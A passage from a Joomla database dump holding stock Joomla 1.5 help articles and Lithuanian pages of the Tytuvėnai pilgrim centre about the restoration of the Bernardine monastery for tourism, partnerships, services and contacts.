will be displayed just the titles. You can set how many titles will be displayed in this table by Parameters. The table layout will also provide a filter Section so that Users can reorder, filter, and set how many titles are listed on a single page (up to 50)</p>\n<h2>Wrapper</h2>\n<p>Wrappers allow you to place stand alone applications and Third Party Web sites inside your Joomla! site. The content within a Wrapper appears within the primary content area defined by the \"mainbody\" tag and allows you to display their content as a part of your own site. A Wrapper will place an IFRAME into the content Section of your Web site and wrap your standard template navigation around it so it appears in the same way an Article would.</p>\n<h2>Content Parameters</h2>\n<p>The parameters for each layout type can be found on the right hand side of the editor boxes in the Menu Item configuration screen. The parameters available depend largely on what kind of layout you are configuring.</p>','',-2,0,0,40,'2008-08-12 22:33:10',135,'','2011-11-30 17:15:36',135,0,'0000-00-00 00:00:00','2006-10-11 06:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',13,0,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(86,170,'Extensions','extensions','','<p>Out of the box, Joomla! does a great job of managing the content needed to make your Web site sing. But for many people, the true power of Joomla! lies in the application framework that makes it possible for developers all around the world to create powerful add-ons that are called <strong>Extensions</strong>. An Extension is used to add capabilities to Joomla! that do not exist in the base core code. Here are just some examples of the hundreds of available Extensions:</p>\n<ul>\n<li>Dynamic form builders</li>\n<li>Business or organisational directories</li>\n<li>Document management</li>\n<li>Image and multimedia galleries</li>\n<li>E-commerce and shopping cart engines</li>\n<li>Forums and chat software</li>\n<li>Calendars</li>\n<li>E-mail newsletters</li>\n<li>Data collection and reporting tools</li>\n<li>Banner advertising systems</li>\n<li>Paid subscription services</li>\n<li>and many, many, more</li>\n</ul>\n<p>You can find more examples over at our ever growing <a href=\"http://extensions.joomla.org\" target=\"_blank\" title=\"Joomla! Extensions Directory\">Joomla! Extensions Directory</a>. Prepare to be amazed at the amount of exciting work produced by our active developer community!</p>\n<p>A useful guide to the Extension site can be found at:<br /><a href=\"http://extensions.joomla.org/content/view/15/63/\" target=\"_blank\" title=\"Guide to the Joomla! Extension site\">http://extensions.joomla.org/content/view/15/63/</a></p>\n<h3>Types of Extensions</h3>\n<p>There are five types of extensions:</p>\n<ul>\n<li>Components</li>\n<li>Modules</li>\n<li>Templates</li>\n<li>Plugins</li>\n<li>Languages</li>\n</ul>\n<p>You can read more about the specifics of these using the links in the Article Index - a Table of Contents (yet another useful feature of Joomla!) - at the top right or by clicking on the <strong>Next </strong>link below.</p>\n<hr title=\"Components\" class=\"system-pagebreak\" />\n<h3><img src=\"images/stories/ext_com.png\" border=\"0\" alt=\"Component - Joomla! Extension Directory\" title=\"Component - Joomla! Extension Directory\" width=\"17\" height=\"17\" /> Components</h3>\n<p>A Component is the largest and most complex of the Extension types. Components are like mini-applications that render the main body of the page. An analogy that might make the relationship easier to understand would be that Joomla! is a book and all the Components are chapters in the book. The core Article Component (<span style=\"font-family: courier new,courier;\">com_content</span>), for example, is the mini-application that handles all core Article rendering just as the core registration Component (<span style=\"font-family: courier new,courier;\">com_user</span>) is the mini-application that handles User registration.</p>\n<p>Many of Joomla!\'s core features are provided by the use of default Components such as:</p>\n<ul>\n<li>Contacts</li>\n<li>Front Page</li>\n<li>News Feeds</li>\n<li>Banners</li>\n<li>Mass Mail</li>\n<li>Polls</li>\n</ul>\n<p>A Component will manage data, set displays, provide functions, and in general can perform any operation that does not fall under the general functions of the core code.</p>\n<p>Components work hand in hand with Modules and Plugins to provide a rich variety of content display and functionality aside from the standard Article and content display. They make it possible to completely transform Joomla! and greatly expand its capabilities.</p>\n<hr title=\"Modules\" class=\"system-pagebreak\" />\n<h3><img src=\"images/stories/ext_mod.png\" border=\"0\" alt=\"Module - Joomla! Extension Directory\" title=\"Module - Joomla! Extension Directory\" width=\"17\" height=\"17\" /> Modules</h3>\n<p>A more lightweight and flexible Extension used for page rendering is a Module. Modules are used for small bits of the page that are generally less complex and able to be seen across different Components. To continue in our book analogy, a Module can be looked at as a footnote or header block, or perhaps an image/caption block that can be rendered on a particular page. Obviously you can have a footnote on any page but not all pages will have them. Footnotes also might appear regardless of which chapter you are reading. Simlarly Modules can be rendered regardless of which Component you have loaded.</p>\n<p>Modules are like little mini-applets that can be placed anywhere on your site. They work in conjunction with Components in some cases and in others are complete stand alone snippets of code used to display some data from the database such as Articles (Newsflash) Modules are usually used to output data but they can also be interactive form items to input data for example the Login Module or Polls.</p>\n<p>Modules can be assigned to Module positions which are defined in your Template and in the back-end using the Module Manager and editing the Module Position settings. For example, \"left\" and \"right\" are common for a 3 column layout.</p>\n<h4>Displaying Modules</h4>\n<p>Each Module is assigned to a Module position on your site. If you wish it to display in two different locations you must copy the Module and assign the copy to display at the new location. You can also set which Menu Items (and thus pages) a Module will display on, you can select all Menu Items or you can pick and choose by holding down the control key and selecting multiple locations one by one in the Modules [Edit] screen</p>\n<p>Note: Your Main Menu is a Module! When you create a new Menu in the Menu Manager you are actually copying the Main Menu Module (<span style=\"font-family: courier new,courier;\">mod_mainmenu</span>) code and giving it the name of your new Menu. When you copy a Module you do not copy all of its parameters, you simply allow Joomla! to use the same code with two separate settings.</p>\n<h4>Newsflash Example</h4>\n<p>Newsflash is a Module which will display Articles from your site in an assignable Module position. It can be used and configured to display one Category, all Categories, or to randomly choose Articles to highlight to Users. It will display as much of an Article as you set, and will show a <em>Read more...</em> link to take the User to the full Article.</p>\n<p>The Newsflash Component is particularly useful for things like Site News or to show the latest Article added to your Web site.</p>\n<hr title=\"Plugins\" class=\"system-pagebreak\" />\n<h3><img src=\"images/stories/ext_plugin.png\" border=\"0\" alt=\"Plugin - Joomla! Extension Directory\" title=\"Plugin - Joomla! Extension Directory\" width=\"17\" height=\"17\" /> Plugins</h3>\n<p>One of the more advanced Extensions for Joomla! is the Plugin. In previous versions of Joomla! Plugins were known as Mambots. Aside from changing their name their functionality has been expanded. A Plugin is a section of code that runs when a pre-defined event happens within Joomla!. Editors are Plugins, for example, that execute when the Joomla! event <span style=\"font-family: courier new,courier;\">onGetEditorArea</span> occurs. Using a Plugin allows a developer to change the way their code behaves depending upon which Plugins are installed to react to an event.</p>\n<hr title=\"Languages\" class=\"system-pagebreak\" />\n<h3><img src=\"images/stories/ext_lang.png\" border=\"0\" alt=\"Language - Joomla! Extensions Directory\" title=\"Language - Joomla! Extensions Directory\" width=\"17\" height=\"17\" /> Languages</h3>\n<p>New to Joomla! 1.5 and perhaps the most basic and critical Extension is a Language. Joomla! is released with multiple Installation Languages but the base Site and Administrator are packaged in just the one Language <strong>en-GB</strong> - being English with GB spelling for example. To include all the translations currently available would bloat the core package and make it unmanageable for uploading purposes. The Language files enable all the User interfaces both Front-end and Back-end to be presented in the local preferred language. Note these packs do not have any impact on the actual content such as Articles.</p>\n<p>More information on languages is available from the <br /><a href=\"http://community.joomla.org/translations.html\" target=\"_blank\" title=\"Joomla! Translation Teams\">http://community.joomla.org/translations.html</a></p>','',-2,0,0,40,'2008-08-11 06:00:00',135,'','2011-11-30 17:14:37',135,0,'0000-00-00 00:00:00','2006-10-10 22:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',26,0,0,'About Joomla!, General, Extensions','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(87,171,'Tytuvėnų bendruomenės vaidmens saugant ir naudojant kultūros paveldą stiprinimas','tytuvn-bendruomens-vaidmens-saugant-ir-naudojant-kultros-paveld-stiprinimas','','<p>VšĮ „Tytuvėnų piligrimų centras“  ir Tytuvėnų bendruomenė parengė projektą „<strong>Tytuvėnų bendruomenės vaidmens saugant ir naudojant kultūros paveldą stiprinimas</strong>“.<br /><br />Projekto tikslas: sustiprinti Tytuvėnų bendruomenės organizacinius ir žmogiškuosius gebėjimus efektyviai visuomenės reikmėms panaudoti turimą kultūros paveldą ir taip suderinti kultūrinio paveldo apsaugą ir bendruomenės vystymąsi.<br /><br />Projekto veiklos: identifikavus pagrindines problemos priežastis, numatytos projekto veiklos, skirtos sustiprinti Tytuvėnų bendruomenės organizacinius ir žmogiškuosius gebėjimus efektyviai visuomenės reikmėms panaudoti turimą kultūros paveldą ir taip suderinti kultūrinio paveldo apsaugą ir bendruomenės vystymąsi.<br /><br />Projekto veiklos yra šios:<br />1.  vienuolyno požemių tyrimai;<br />2.  bendruomenės narių mokymai ir institucijos stiprinimas;<br />3.  turistinės  informacijos parengimas.<br /><br /><br />Projekto pasiekimai pirmiausia sustiprins Tytuvėnų bendruomenės kompetencijas, Tytuvėnų bendruomenę kaip organizaciją.<br />Sustiprėjusi ir tinkamų žinių ir gebėjimų turinti Tytuvėnų bendruomenė ilgu laikotarpiu padidins Tytuvėnų kultūros paveldo teikiamą naudą vietos gyventojams, ūkio subjektams: padidins atvykstančių turistų skaičių, pailgins jų buvimo Tytuvėnuose trukmę ir taip padidins vietos ūkio subjektų pajamas, kurios atitinkamai gerins gyventojų gyvenimo kokybę.<br /><br />Jausdama tiesioginę naudą iš kultūros paveldo objektų, Tytuvėnų bendruomenė bus motyvuota maksimaliai suderinti savo ūkinę ir kultūros paveldo saugojimą bei panaudojimą.<br />Numatoma projekto vertė yra 342.650,00 LT</p>','',1,0,0,41,'2011-04-04 11:42:31',135,'','2011-10-31 11:13:14',135,0,'0000-00-00 00:00:00','2011-04-04 11:42:31','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',9,0,3,'','',1,280,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(88,172,'Tytuvėnų bernardinų vienuolyno ansamblio pritaikymas turizmo reikmėms','tytuvn-bernardin-vienuolyno-ansamblio-pritaikymas-turizmo-reikmms','','<p>Projektas <strong>„Tytuvėnų bernardinų vienuolyno ansamblio pritaikymas turizmo reikmėms“</strong> 2008 m. spalio 27 d. Lietuvos Respublikos ūkio ministro įsakymu  yra įtrauktas į Valstybės planuojamų turizmo projektų, siūlomų finansuoti iš 2007–2013 m. Europos Sąjungos paramos lėšų. Projekto „Tytuvėnų bernardinų vienuolyno ansamblio pritaikymas turizmo reikmėms“.<br /><br />Pagrindinis turizmo traukos objektas, kuris neabejotinai turi didžiulę istorinę, meninę, kultūrinę bei religinę - sakralinę išliekamąją vertę yra nepritaikytas turizmui. Nėra galimybės – skatinti atvykstamąjį ir vietos turizmą, tinkamai išnaudojant unikalų kultūros paminklą, bei sukuriant sąlygas kultūriniam – pažintiniam – piligriminiam turizmui.  Švč. Mergelės Marijos bažnyčios ir bernardinų vienuolyno ansamblis, kurį sudaro net 11 į kultūros vertybių registrą įrašytų atskirų objektų nesuteikia sąlygų tinkamai priimti turistus. Esama paveldo infrastruktūrą nepritaikyta kultūriniam ir paveldo bei piligriminiam turizmui, nėra sukurta pakankama laisvalaikio bei kita infrastruktūra, kas trukdo ateiti privačiam kapitalui, teiksiančiam apgyvendinimo, maitinimo, laisvalaikio ir kitas susijusias paslaugas. Kai kurių kompleksą sudarančių paveldo objektų būklė yra avarinė, todėl neinvestavus į kompleksą,  jų būklė tik blogės.<br /><br />Projekto tikslas: kompleksiškai pritaikyti Tytuvėnų Šv. Mergelės Marijos bažnyčios ir bernardinų vienuolyno ansamblį turizmui, išlaikant objekto unikalumą ir autentiškumą bei sukuriant sąlygas privačioms investicijoms, piligrimystę ir turizmą skatinančioms, palaikančioms bei aptarnaujančioms paslaugoms ir veikloms vykdyti.<br /><br />Projekto uždaviniai, veiklos: atkurti bei sutvarkyti bažnyčios ir vienuolyno komplekso – kultūros paminklo unikaliuosius  ir vertinguosius objektus bei kitą jų infrastruktūrą. Tokiu būdu suformuojamas reikšmingas piligrimų, turistų traukos objektas.<br /><br />Įgyvendinus projektą bus sumažintas turizmo sezoniškumas, kadangi kultūros paveldo objektas vertingas ne tik savo išore bet ir vidaus ekspozicija. Įgyvendinus projektą taip pat būtų išspręsta ir dar viena turizmo sezoniškumo problema, t.y. šiuo metu nėra turizmo informacijos centro, kuris atsirastų ir veiktų uždarose patalpose ištisus metus tuo užtikrindamas piligrimų, turistų sutikimą, ekskursijų organizavimą, turistų ir piligrimų grupių aptarnavimą bet kuriuo metų laiku. Esant aptarnaujančiam personalui būtų galimybė organizuoti renginius, parodas, konferencijas ištisus metus.<br /><br />Gautos paramos lėšos bus panaudojamos avarinės būklės šalinimui, perdangų keitimui, langų ir durų keitimui analogiškomis medžiagomis, muziejaus įkūrimui, vienuolyno celių atkūrimui.<br />Numatoma projekto vertė yra 10 100 000,00 LT</p>','',1,0,0,41,'2011-04-04 11:24:52',135,'','2011-10-31 11:17:00',135,0,'0000-00-00 00:00:00','2011-04-04 11:24:52','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',15,0,1,'','',1,237,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(89,173,'Projektas „Tytuvėnų Bernardinų vienuolyno ansamblio pritaikymas turizmo reikmėms“ įgyvendintas','projektas-baigtas','','<p>Spalio 1 d. baigtas įgyvendinti projektas „Tytuvėnų Bernardinų vienuolyno ansamblio pritaikymas turizmo reikmėms“. Projektui įgyvendinti devynių milijonų litų finansinę paramą suteikė 2007-2013 m. Europos Sąjungos struktūriniai fondai, 140 tūkst. litų skyrė Kelmės rajono savivaldybė, o vienas milijonas litų skirtas iš valstybės biudžeto.</p>\n<p>Pasak laikinai pareigas einančio VšĮ „Tytuvėnų piligrimų centras“ direktoriaus Prano Jurkaičio, pagrindinis projekto tikslas buvo kompleksiškai pritaikyti Tyttuvėnų švenčiausiosios Mergelės Marijos bažnyčios ir Bernardinų vienuolyno ansamblį turizmui, išlaikant objekto unikalumą ir autentiškumą, sukurti sąlygas privačioms investicijoms, skatinančioms piligrimystę ir turizmą, palaikančioms bei aptarnaujančioms paslaugoms ir veikloms vykdyti.</p>\n<p>– Pradėjus eksploatuoti objektą bus sumažintas turizmo sezoniškumas, kadangi kultūros paveldo objektas vertingas ne tik savo išore, bet ir vidaus ekspozicija. Vienuolyne įkurtas Šiaulių vyskupijos bažnytinio paveldo muziejus, kurio ekspozicijoje: monstrancijos, komuninės taurės, relikvijorai, šventųjų paveikslai. Restauruodami vienuolyną, po dažais slėptas freskas atkūrė 20 restauratorių. Jos senovėje tapytos vienu stiliumi, todėl manoma, kad vienuolynas turėjo savo dailininką, – sakė P. Jurkaitis.</p>\n<p>Restauruotose vienuolyno patalpose įkurtas ne tik Sakralinio meno muziejus, bet ir Tytuvėnų piligrimų centro patalpos ir konferencijų salė. Visa tai leis kompleksiškai tenkinti turistų, atvykusių aplankyti Tytuvėnų Švenčiausiosios Mergelės Marijos bažnyčios ir Bernardinų vienuolyno ansamblį, poreikius.</p>\n<p><img src=\"images/stories/veikla/kuriame-lietuvos-ateiti_2.jpg\" border=\"0\" width=\"343\" height=\"60\" /></p>','',1,0,0,41,'2011-12-03 13:30:21',135,'','2011-12-03 14:01:40',135,0,'0000-00-00 00:00:00','2011-12-03 13:30:21','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',5,0,2,'','',1,1090,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(90,174,'Pasirašyta bendradarbiavimo sutartis','pasirasyta-sutartis','','<p>Kelmės rajono Tytuvėnų gimnazija, atstovaujama direktorės Irmos Stankuvienės  ir VšĮ „Tytuvėnų piligrimų centras“, atstovaujamas l.e.p. direktoriaus Prano Jurkaičio, 2011 m.  birželio 7 dieną  pasirašė bendradarbiavimo sutartį. <br /><br />Restauruotas duris atversiantis vienuolynas turėtų tapti ne tik dvasiniu, bet ir kultūriniu židiniu Kelmės rajone. Tačiau, kad meninės, istorinės vertybės išliktų amžinomis turime skatinti jaunimą domėtis dvasiniu pasauliu.  <br /><br />Šios sutarties uždaviniai -  sudaryti palankias sąlygas  gerosios  darbo patirties sklaidai, organizuoti bendrą veiklą  ir projektų vykdymą.<br /><br />Abi sutarties šalys tikisi, kad iniacityvus jaunimas prisidės prie organizuojamų renginių, projektinės veiklos ne tik savo idėjomis, bet ir kruopščiu darbu.</p>\n<table style=\"text-align: center; width: 500px; height: 40px;\" border=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td>\n<p style=\"TEXT-ALIGN: center\"><img src=\"images/stories/veikla/sut_su_tytvm_1.jpg\" border=\"0\" alt=\"alt src=http://www.tytuvenai.eu/images/stories/veikla/sut_su_tytvm_1.jpg\" width=\"300\" /></p>\n</td>\n<td>\n<p style=\"TEXT-ALIGN: center\"><img src=\"images/stories/veikla/sut_su_tytvm3.jpg\" border=\"0\" width=\"300\" /></p>\n</td>\n</tr>\n<tr>\n<td> </td>\n<td> </td>\n</tr>\n</tbody>\n</table>\n<p style=\"TEXT-ALIGN: right\">VšĮ „Tytuvėnų piligrimų centro“ informacija</p>','',1,0,0,42,'2011-06-10 21:44:19',135,'','2011-11-04 18:27:58',135,0,'0000-00-00 00:00:00','2011-06-10 22:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',2,0,1,'','',1,1255,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(91,175,'Why does Joomla! 1.5 use UTF-8 encoding?','why-does-joomla-15-use-utf-8-encoding','','<p>Well... how about never needing to mess with encoding settings again?</p><p>Ever needed to display several languages on one page or site and something always came up in Giberish?</p><p>With utf-8 (a variant of Unicode) glyphs (character forms) of basically all languages can be displayed with one single encoding setting. </p>','',-2,0,0,43,'2008-08-05 01:11:29',135,'','2008-08-05 01:11:29',135,0,'0000-00-00 00:00:00','2006-10-03 10:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',8,0,0,'','',1,30,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(92,176,'My MySQL database does not support UTF-8. Do I have a problem?','my-mysql-database-does-not-support-utf-8-do-i-have-a-problem','','No you don\'t. Versions of MySQL lower than 4.1 do not have built in UTF-8 support. However, Joomla! 1.5 has made provisions for backward compatibility and is able to use UTF-8 on older databases. Let the installer take care of all the settings and there is no need to make any changes to the database (charset, collation, or any other).','',-2,0,0,43,'2008-08-07 09:30:37',135,'','2008-08-07 09:30:37',135,0,'0000-00-00 00:00:00','2006-10-05 20:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',10,0,0,'','',1,10,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(93,177,'Apie centrą','apiecentra','','<p> </p>\r\n<p>Viešoji įstaiga „Tytuvėnų piligrimų centras“ įsteigta 2008 m. kovo 28 dieną.<br />Įstaigos steigėjai dalininkai: Kelmės rajono savivaldybės taryba, Šiaulių vyskupijos kurija, Tytuvėnų Švč. M. Marijos Angelų Karalienės parapija.<br /><br />Tytuvėnų piligrimų centro tikslai:<br />Įgyvendinti Tytuvėnų Bernardinų vienuolyno rekonstrukciją bei pritaikyti vienuolyno pastatą turizmo veiklai, piligrimų, tikinčiųjų poreikiams ir dvasinėms reikmėms tenkinti.<br /><br /></p>\r\n<p> </p>\r\n<p>Tytuvėnų piligrimų centro uždaviniai:</p>\r\n<ul>\r\n<li>rengti ir įgyvendinti kultūros, švietimo, meno plėtojimo, turizmo vystymo programas;</li>\r\n<li>plėtoti Tytuvėnų architektūrinio ansamblio išsaugojimo ir turizmo institucijų ryšius;</li>\r\n<li>skatinti visuomenės kultūrinę veiklą, turizmą ir piligrimystę.</li>\r\n</ul>\r\n<p> </p>\r\n<p>VšĮ „Tytuvėnų piligrimų centras“ siūlomos paslaugos:<br /><br /></p>\r\n<ul>\r\n<li>ekskursijos po Tytuvėnų miestelį,</li>\r\n<li>ekskursijos po Tytuvėnų bernardinų vienuolyną,</li>\r\n<li>ekskursijos po Kelmės rajono lankomus objektus,</li>\r\n<li>individualių maršrutų sudarymas,</li>\r\n<li>konsultacijos (apgyvendinimo, maitinimo),</li>\r\n<li>bažnyčios puošimas vestuvių proga,</li>\r\n<li>nakvynės ir maitinimo paslaugos.</li>\r\n</ul>\r\n<p><br />Mes siūlome maloniai praleisti laiką Tytuvėnų miestelyje, kur galima pasimėgauti miškų ošimu, ežerų gaiva ir nuostabia aplinka. O norintiems kultūrinių žinių, kviečiame į Tytuvėnų bernardinų vienuolyno ansamblį.<br />Vienuolyno komplekse praleisti laiką gali įvairaus amžiaus nuotykių ištroškę keliautojai, turistai. Suaugusius sudomins išsami Tytuvėnų bernardinų vienuolyno istorija ir didingų vargonų koncertas.</p>\r\n<p><strong>Kviečiame užsisakyti ekskursijas, edukacines programas, organizuoti seminarus, konferencijas, apsistoti svečių namuose \"Domus Rafaelis\", išsinuomoti dviračius kelionėms po Tytuvėnų apylinkes.<br /></strong><br />Plačiau apie ekskursijas skaitykite skyrelyje <a href=\"index.php/apie-centra/ekskursijos\">\"Ekskursijos\"</a>.</p>\r\n<p> </p>\r\n<p><iframe src=\"images/stories/skaidres.pdf\" width=\"860\" height=\"680\"></iframe></p>','',1,0,0,31,'2006-08-11 15:14:11',135,'','2018-06-12 13:41:37',135,0,'0000-00-00 00:00:00','2006-10-10 12:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"1\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"1\",\"show_email_icon\":\"1\",\"show_vote\":\"0\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',35,0,16,'','',1,17792,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(94,178,'Struktūra ir kontaktai','kontaktai','','<p><strong><img src=\"images/schema.jpg\" border=\"0\" alt=\"\" /></strong></p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p><img src=\"images/sandra.jpg\" border=\"0\" alt=\"\" /></p>\r\n </td>\r\n<td> </td>\r\n<td valign=\"top\"><br />\r\n<p><strong>Direktorė Sandra Sabaliauskienė</strong><br /><span>Mob. tel. +370 672 44199</span><br /><span>El. paštas: </span><a href=\"mailto:s.sabaliauskiene@infotytuvenai.lt\">s.sabaliauskiene@infotytuvenai.lt</a></p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/cv.pdf\" target=\"_blank\"><img 